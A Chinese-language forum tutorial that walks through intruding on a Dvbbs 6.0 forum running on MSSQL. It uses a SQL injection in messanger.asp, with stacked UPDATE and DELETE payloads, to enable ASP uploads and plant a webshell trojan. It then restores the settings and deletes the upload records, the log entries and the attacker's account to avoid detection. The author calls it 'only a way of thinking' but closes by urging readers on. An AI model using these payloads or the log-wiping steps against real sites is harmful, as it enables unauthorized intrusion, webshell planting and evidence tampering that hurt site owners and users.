文章作者:臭要饭的!
前言:
入侵需要安全,脚本入侵当然也需要安全,我们怎么以最快,最安全的方式入侵成功?
这是值得我们讨论的问题.对于脚本而言,拿到WEBSHELL就是第一个目标,也就是最基本的目标,很多论坛都提供文件上传的功能,我们利用这个上传功能就可以拿到WEBSHELL。默认情况下你是不能上传脚本文件上去的。不过通过修改设置我们就可以上传了。目前很多论坛分为,ACCESS版和MSSQL版,如果是ACCESS版的,我们入侵就不能是最快的了。因为要先去破解前后台管理员的密码。然后进后台再修改设置。再上传文件。所以今天我重点为大家介绍采用MSSQL数据库的论坛
1、为什么这里讲利用MSSQL数据库就可以最快的呢?
因为MSSQL中支持多步执行SQL语句命令。而ACCESS不支持!
所以,我们就可以利用SQL语句来直接修改库。要知道这种方式是最快的。
后台管理员,也无非是通过进入后台,通过脚本程序来修改表中的设置。
所以,通过直接修改表的步骤是最简单的。也是最快的。
对于入侵者来讲,这就是他们所要做的。
2、为什么这里讲利用MSSQL数据库就可以最安全的呢?
很多人能过上传木马,得到WEBSHELL就开心了,就高兴了。
可是你们想想,他们做了些什么?通过漏洞,加自己为前台管理员!
然后,再利用漏洞,添加,要不修改后台管理员密码。这不,就达到目的了。
进前台,再进后台,上传木马。成功了,开心了。
分析一下。对数据库的改过有哪些。
第一:数据库用户表中,多了一个前台管理员。
第二:管理员表中,后台管理员的密码被改!
第三:保存上传文件的表中多了一条上传记录!
第四:有你的操作过程的日志。保存在日志表中!
通过,以上四点。管理员再笨也查得出被入侵了。最起码,很多人没有把第三,第四给清除掉。
所以,谈到安全这点,还是希望大家看看下面我的做法。我并不是教大家怎么入侵。这只是一种思
维的分析。只有分析才能进步!思维比入侵更重要!被发现的入侵是不成功的入侵.
我们以动网短消息漏洞为例!讲解快速、安全的入侵的方式!
在6.0中的动网短消息漏洞,大家都应该非常了解了吧。此漏洞是存在于messanger.asp文件中的,传递的ID参数,只过滤了单引号。好吧。我们开始吧!
看了代码。参数用request("id")来接受。我们可以采用POST方式提交这个参数了。
这样更安全。
自己做一个HTML文件来提交参数。如下:
<form action=http://www.something.com/messanger.asp?action=删除草稿 method=post>
<input type=text name=id width=32 size=100>
<input type=submit>
</form>
这样,我们就可以利用输入框向远程主机提交参数了。
第一步:得到数据库中表中的上传设置.
注册一个账号,找到自己的ID号,再看看,你要在哪个版面上传木马。找到版面ID号(到论坛去看一下,就找到了)。
这里,我以自己的ID号为1001和版面为1为例子给大家讲解!
在输入框中提交:
1); update [user] set homepage=(select board_setting from board where boardid=1) where userid=1001;--
这样,他的设置就在你的个人资料中的联系方式中的个人主页地址中了。
我们在个人主页中。修改一下他的设置在中间插入一个|asp这样就可以。然后点保存。
第二步:修改表中的上传参数,上传木马。
倒着来,再把你的个人主页中的设置替换掉他的上传设置。
1); update board set board_setting=(select homepage from [user] where userid=1001) where boardid=1;--
现在,你就可以去上传文件了。
第三步:上传自己的脚本木马。
我们在刚才的版面中,发表一个新贴,上传木马。呵呵,浏览文件,选好木马点上传。这时就不要动了!
看到下面的文本框中出现什么了吗?
[upload=asp]UploadFile/200311181122210853.asp[/upload]
看到了这个,你就不用点发表了。因为文件已经上去了。并且文件路径和文件名也出来了。
直接访问:
http://www.something.com/UploadFile/20041181122210853.asp
木马就在这里了。
第四步:恢复表中的上传设置.
1); update [user] set homepage=(select board_setting from board where boardid=1) where userid=1001;--
去掉|asp
1); update board set board_setting=(select homepage from [user] where userid=1001) where boardid=1;--
更新设置。OK。这样表中的上传设置就恢复了。
第五步 :删除上传的文件在表中存在的记录.
上传的文件保存在dv_upFile表中的。
先把上传的文件名,写入自己的个人主页中。呵呵。
提交:
1); delete from dv_upfile where F_FileName=(select homepage from [user] where userid=1001);--
这样就删除了,你上传的文件记录。
第六步:删除论坛记录的日志。
你的操作会被记录在脚本系统的日志中的。我们来清除我们所有的操作记录。
提交:
1); delete from [log] where L_UserName=(select UserName from [user] where userid=1001);--
这样,我们就删除了,自己的所有操作日志.
第七步:删除自己的ID号。
到这里,你可以删除自己的ID号,也可以不删除。因为到现在为止,管理员也不会发现你做了些什么。
如果要删除,我们提交下面的语句就删除了。
提交:
1); delete from [user] where userid=1001;--
OK。所有的工作到这里就结束了。你现在可以用你的木马了。
结束分析:
这里我是以动网短消息漏洞为例的。脚本对参数本身过滤了单引号,所以比较麻烦点。如果没有对参数进行过滤,那么我们的工作效率,会更快。
今天为大家谈的只是一种思路,我们打破一切的限制,直接拿WEBSHELL。这种思路适合于任何一个论坛。
很多情况下,后台登陆如果限制了IP的话。就算你修了管理员密码,你也进不去。
让IP,让MD5不再限制我们。我们就从这里开始! 快速,安全,你做得到!相信我!
